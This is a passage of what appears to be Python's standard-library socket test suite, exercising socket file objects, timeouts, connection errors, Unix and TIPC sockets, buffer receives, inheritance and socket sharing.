with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise TimeoutError('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = socket_helper.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = socket_helper.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = socket_helper.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
try:
socket.create_connection((HOST, 1234))
except TimeoutError:
pass
except OSError as exc:
if socket_helper.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
raise
else:
self.fail('TimeoutError not raised')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = socket_helper.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port),
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port),
timeout=support.LOOPBACK_TIMEOUT,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(TimeoutError, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except TimeoutError:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except TimeoutError:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except TimeoutError:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class UDPLITETimeoutTest(SocketUDPLITETest):
def testUDPLITETimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (UDPLITE)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except TimeoutError:
self.fail("caught timeout instead of error (UDPLITE)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDPLITE)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
self.assertIs(socket.error, OSError)
self.assertIs(socket.timeout, TimeoutError)
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
socket_helper.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(os_helper.TESTFN)
self.bind(self.sock, path)
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(os_helper.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(os_helper.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if os_helper.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(os_helper.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(os_helper.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules", encoding="utf-8")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(True)
self.checkNonblock(s, nonblock=False)
s.setblocking(False)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(True)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
